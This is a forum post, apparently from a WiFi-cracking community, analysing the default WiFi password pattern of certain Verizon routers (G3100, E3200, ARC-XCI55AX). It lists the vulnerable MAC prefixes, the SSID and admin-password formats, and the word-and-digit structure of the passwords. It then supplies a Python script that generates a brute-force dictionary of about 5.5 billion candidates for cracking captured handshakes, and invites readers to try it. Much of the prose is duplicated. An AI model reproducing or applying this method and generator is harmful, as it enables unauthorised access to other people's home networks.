I have a thread here where I have been working on collecting / analyzing WiFi passwords for various Verizon devices. I have managed to collect quite a few. Through analysis, I have found a subset that is vulnerable to brute force. Here’s what I’ve found:
From my observations, the correct MAC address (BSSID) is broadcast in the handshake.
For G3100/E3200 devices
MAC address Block 3C.BD.C5.50.05.44 to 3C.BD.C5.FF.FF.FF and all of the DC.F5.1B, 74.90.BC MACS
Because of the hyphens, single digit and 15 character limit <word> is ALWAYS comprised of a 3 character, a 4 character and a 5 character word. No other pattern is mathematically possible. Additionally, the <number> is always a single digit that is NEVER 0,1, 2, 5, or 8 and NEVER on the last word.
The ARC-XCI55AX follow the exact same pattern (except for a single 14 character entry). I doubled checked and the MAC prefixes 04.09.86, 18.58.80, 4C.22.F3, 54.B7.BD, A8.A2.37, AC.B6.87, C8.99.B2, F4.CA.E7 currently appear unique to this device. 84.90.0A and BC.F8.7E are found in the CR1000 dataset, but the current entries in this space also fit this pattern.
So those would be the MAC prefixes vulnerable to the built dictionary. Attached below, I have separated the collected passwords into 3 letter (372), 4 letter (605) , and 5 letter (412)words. I have also included the words from these wordlists and removed duplicates. Currently there are 5,563,483,200 possible combinations. The built dictionary would be over 95 GB, and change the next time I update the password list. So I am including a python script to build the dictionary instead. The script will ask you where the 3 wordlists are located, and then calculate the # of combinations and file size, and prompt you to continue before generating the combinations and saving output_combinations.txt to the same folder.
Please let me know if you encounter any errors or issues with the script. I’d love to hear your results if you give the dictionary a try!
From my observations, the correct MAC address (BSSID) is broadcast in the handshake.
For G3100/E3200 devices
MAC address Block 3C.BD.C5.50.05.44 to 3C.BD.C5.FF.FF.FF and all of the DC.F5.1B, 74.90.BC MACS
- SSID is Verizon_XXXXXX where X is any char <A-Z><0-9>
SSID Passwords are 15 char and follow <word>-<word>-<word> with a single digit at the end of one word (ex: range-joy3-okey)
Admin Passwords are 9 characters that are <A-Z><0-9> (ex: NQ4BJLC7H)
Because of the hyphens, single digit and 15 character limit <word> is ALWAYS comprised of a 3 character, a 4 character and a 5 character word. No other pattern is mathematically possible. Additionally, the <number> is always a single digit that is NEVER 0,1, 2, 5, or 8 and NEVER on the last word.
The ARC-XCI55AX follow the exact same pattern (except for a single 14 character entry). I doubled checked and the MAC prefixes 04.09.86, 18.58.80, 4C.22.F3, 54.B7.BD, A8.A2.37, AC.B6.87, C8.99.B2, F4.CA.E7 currently appear unique to this device. 84.90.0A and BC.F8.7E are found in the CR1000 dataset, but the current entries in this space also fit this pattern.
So those would be the MAC prefixes vulnerable to the built dictionary. Attached below, I have separated the collected passwords into 3 letter (372), 4 letter (605) , and 5 letter (412)words. I have also included the words from these wordlists and removed duplicates. Currently there are 5,563,483,200 possible combinations. The built dictionary would be over 95 GB, and change the next time I update the password list. So I am including a python script to build the dictionary instead. The script will ask you where the 3 wordlists are located, and then calculate the # of combinations and file size, and prompt you to continue before generating the combinations and saving output_combinations.txt to the same folder.
Please let me know if you encounter any errors or issues with the script. I’d love to hear your results if you give the dictionary a try!
Code:
import os
from tkinter import Tk, filedialog, messagebox
from itertools import product, permutations
def load_words(file_path):
try:
with open(file_path) as f:
return [line.strip() for line in f if line.strip()]
except FileNotFoundError:
print(f"File not found: {file_path}")
return []
def estimate_output_size(word_counts, digits=5, line_len=18):
total_lines = 0
for perm in permutations([3, 4, 5]):
w1, w2, w3 = word_counts[perm[0]], word_counts[perm[1]], word_counts[perm[2]]
total_lines += w1 * w2 * w3 * digits * 2 # 2 positions for the digit
est_size_bytes = total_lines * line_len
est_size_mb = est_size_bytes / (1024 * 1024)
return total_lines, est_size_mb
def main():
# Open folder picker dialog
root = Tk()
root.withdraw()
folder_path = filedialog.askdirectory(title="Select Folder with Word Lists")
if not folder_path:
print("No folder selected.")
return
# File paths
file3 = os.path.join(folder_path, "3_letter_words.txt")
file4 = os.path.join(folder_path, "4_letter_words.txt")
file5 = os.path.join(folder_path, "5_letter_words.txt")
# Load word lists
words = {
3: load_words(file3),
4: load_words(file4),
5: load_words(file5)
}
if not all(words.values()):
print("One or more word lists are empty or missing.")
return
# Estimate total combinations and size
word_counts = {k: len(v) for k, v in words.items()}
total_lines, est_size_mb = estimate_output_size(word_counts)
print(f"Estimated combinations: {total_lines:,}")
print(f"Estimated output file size: {est_size_mb:.2f} MB\n")
proceed = input("Do you want to proceed? (y/n) ")
if (proceed == "n"):
print("User canceled generation.")
return
digits = ['3', '4', '6', '7', '9']
output_file = os.path.join(folder_path, "output_combinations.txt")
print("Generating combinations...")
with open(output_file, "w") as f:
for order in permutations([3, 4, 5]):
wlist1, wlist2, wlist3 = words[order[0]], words[order[1]], words[order[2]]
for w1, w2, w3 in product(wlist1, wlist2, wlist3):
for d in digits:
f.write(f"{w1}{d}-{w2}-{w3}\n")
f.write(f"{w1}-{w2}{d}-{w3}\n")
print(f"Done! Output saved to:\n{output_file}")
if __name__ == "__main__":
main()